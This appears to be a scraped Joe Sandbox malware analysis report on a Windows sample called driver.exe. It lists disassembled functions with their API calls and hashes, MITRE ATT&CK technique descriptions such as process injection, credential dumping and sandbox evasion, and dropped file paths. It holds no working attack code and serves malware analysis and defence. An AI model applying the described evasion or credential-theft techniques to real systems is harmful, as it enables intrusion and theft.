Instruction ID: 9ea54360541f49991f405e2e129960d18bb4890c3cfa635fd63ee955de25f109
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: 025187266086A196EA68FF27E4A4379E360FB49B84F8C4135DE4E46690CF3DD445CB21

Function 00007FF7542A978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A97A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A9807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A9841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7542A3CEF,?,?,00000000,00007FF7542A3CAA,?,?,00000000,00007FF7542A3FD9), ref: 00007FF7542A986B

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: e8bb201729ba6cce79bf0ef69a8be5ff4fe66e39cbd63c578b448f0fb66d308c
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: F621C522F0876185E620AF13A49012DE6A4FB48FE0F8C4635DE9E23B94DF7DD8528714

Function 00007FF7542A65BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7542A662E
GetFileType.KERNELBASE ref: 00007FF7542A6644

Strings

@, xrefs: 00007FF7542A666F

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: 3f1a52b5e6f1e11e1ceff5c3f3ff6000a05e7b0d4b7f63b32d8eb8a4bc1a42ee
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: 8021D123E0876240EB649F2794F0139A654EB45B70F6C9335DAAE077D4CF7EE881C210

Function 00007FF75424681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7542468AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7542468BF

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: a35c029cbef2487216c0bc08669bb747f54053bfe30e3f5332530811f9928b68
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: 03218463D08F9582DB019F2AD5910B86360FB98B88F58E321DF9D43656EF29E5E58300

Function 00007FF75427915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF7542791CA
new.LIBCMT ref: 00007FF7542791F2

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6415d06f8006144dc1d0689d5df6806aea5b85874021d19cae4450d81380496d
Instruction ID: a0edfaead35325fd3e9d4307995b1e29371521a95e8130e7824bcac074610c71
Opcode Fuzzy Hash: 6415d06f8006144dc1d0689d5df6806aea5b85874021d19cae4450d81380496d
Instruction Fuzzy Hash: 4E118131509B9181EA00BF66A9A43A9F2E4FF84790FA84634D69D077E6DE79D0618360

Function 00007FF7542871FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc5ec8cd6c4596df62870985cb321f9a7caf6a31d95500942cea3766e9a513d
Instruction ID: f21dc2be86dc486d63abc2150f1ba220d6ef44b675a61aeda13751f8c2aa7cae
Opcode Fuzzy Hash: 5dc5ec8cd6c4596df62870985cb321f9a7caf6a31d95500942cea3766e9a513d
Instruction Fuzzy Hash: 00E1D521A0C7A241FB20BF2298E42BDE751EF91B88F8C4135DD4D9B7D6DE2EA445C721

Function 00007FF754264554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF754264590

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
Instruction ID: fcc8d4e6d9f4cfda7d0f85470fdafad40778dca63d8de54de8e2e4a66f593fc0
Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
Instruction Fuzzy Hash: 79F0F9219082D151DB11AF7650912F8B751AF16BF8F4C4334DEBD0B2C7CE5E90848B30

Function 00007FF7542738A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: 2bf7ecc6072a709325cd3ee31bc56eaa12c0e6db44310fe86dd3558db90a72c8
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: 80E04F91F2A32281ED5D3F2318F107982402F5AB80E9C5438CC1E06382DC2FA455A621

Function 00007FF754264538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF754287A8C), ref: 00007FF754264549

Memory Dump Source

Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true

Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: 0130bfad65ffc5c4db8d6dc79401c7f2b4a2b8b1b5a5926060880f9065524a91
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: 4FC02B21E018C180C5047B2F8CE50342111BF58739FD80330C23E051E0CF1944EB0310

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report driver.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ??? \Display (1).png

C:\Users\user\AppData\Local\Temp\Ffb7z.zip

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RESF5CD.tmp

Windows Analysis Report
driver.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
